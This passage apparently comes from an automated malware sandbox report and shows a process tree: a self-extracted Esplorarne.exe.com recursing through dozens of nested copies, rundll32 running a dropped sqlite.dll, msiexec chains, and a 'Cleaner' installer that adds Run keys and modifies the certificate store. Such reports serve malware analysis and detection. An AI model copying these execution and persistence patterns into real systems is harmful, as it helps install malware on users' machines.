                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          27⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:8404
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            28⤵
                                                                                                                                                                                              PID:8680
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                29⤵
                                                                                                                                                                                                  PID:8840
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                      PID:9084
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                          PID:9160
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                              PID:7332
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                33⤵
                                                                                                                                                                                                                  PID:8064
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    34⤵
                                                                                                                                                                                                                      PID:8296
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        35⤵
                                                                                                                                                                                                                          PID:8232
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            36⤵
                                                                                                                                                                                                                              PID:8788
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                37⤵
                                                                                                                                                                                                                                  PID:8876
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                    38⤵
                                                                                                                                                                                                                                      PID:9064
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                        39⤵
                                                                                                                                                                                                                                          PID:8936
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                            40⤵
                                                                                                                                                                                                                                              PID:7688
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                41⤵
                                                                                                                                                                                                                                                  PID:8808
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                    42⤵
                                                                                                                                                                                                                                                      PID:5408
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                        43⤵
                                                                                                                                                                                                                                                          PID:7892
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                            44⤵
                                                                                                                                                                                                                                                              PID:5476
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                45⤵
                                                                                                                                                                                                                                                                  PID:8700
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                    46⤵
                                                                                                                                                                                                                                                                      PID:8796
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                        47⤵
                                                                                                                                                                                                                                                                          PID:8812
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                            48⤵
                                                                                                                                                                                                                                                                              PID:8644
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                49⤵
                                                                                                                                                                                                                                                                                  PID:8492
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                    50⤵
                                                                                                                                                                                                                                                                                      PID:7368
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                        51⤵
                                                                                                                                                                                                                                                                                          PID:5936
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            52⤵
                                                                                                                                                                                                                                                                                              PID:8084
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                53⤵
                                                                                                                                                                                                                                                                                                  PID:1272
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                    54⤵
                                                                                                                                                                                                                                                                                                      PID:8356
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                        55⤵
                                                                                                                                                                                                                                                                                                          PID:8160
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                            56⤵
                                                                                                                                                                                                                                                                                                              PID:8696
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                57⤵
                                                                                                                                                                                                                                                                                                                  PID:8968
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                    58⤵
                                                                                                                                                                                                                                                                                                                      PID:9172
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                        59⤵
                                                                                                                                                                                                                                                                                                                          PID:7576
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                            60⤵
                                                                                                                                                                                                                                                                                                                              PID:4740
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                61⤵
                                                                                                                                                                                                                                                                                                                                  PID:5056
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                    62⤵
                                                                                                                                                                                                                                                                                                                                      PID:8216
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                        63⤵
                                                                                                                                                                                                                                                                                                                                          PID:7628
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                            64⤵
                                                                                                                                                                                                                                                                                                                                              PID:7956
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                65⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7212
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                    66⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7560
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                        67⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8652
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                            68⤵
                                                                                                                                                                                                                                                                                                                                                              PID:7856
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                69⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7736
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                    70⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:8268
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                        71⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:8412
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                            72⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7796
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                73⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:8864
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                    74⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                    PID:2876
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                      75⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4344
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                          76⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5268
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                              77⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:340
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                  78⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:8644
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                      79⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:8268
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                                                                                                                                          80⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:7776
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                              ping GFBFPSXA -n 30
                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                              PID:5348
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:4416
                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                PID:5448
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                  PID:5484
                                                                                                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                PID:6576
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 244608448B98E920DA813441CA0DA3DC C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:4908
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding EFCA3F849F4723DADADFE01429DE7527 C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:7640
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 541554DBD823D7589206B67A202703E4 C
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                  PID:7564
                                                                                                                                                                                                                                                • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 19DC91FC3BE61FD09AD628F4B6B0FD76
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                  PID:8096
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                                                                                  PID:8812
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    PID:8032
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                      PID:8720
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1ac,0x1e8,0x7ffae1d2dec0,0x7ffae1d2ded0,0x7ffae1d2dee0
                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:4416
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x74,0x120,0x124,0xa8,0x128,0x7ff66eed9e70,0x7ff66eed9e80,0x7ff66eed9e90
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:7144
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --mojo-platform-channel-handle=1704 /prefetch:8
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:3844
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --mojo-platform-channel-handle=2132 /prefetch:8
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:3328
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                              PID:5748
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:1
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                              PID:6096
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1532,16485556465495242517,13138568180526061926,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8720_317702184" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2600 /prefetch:1
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                              PID:360
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
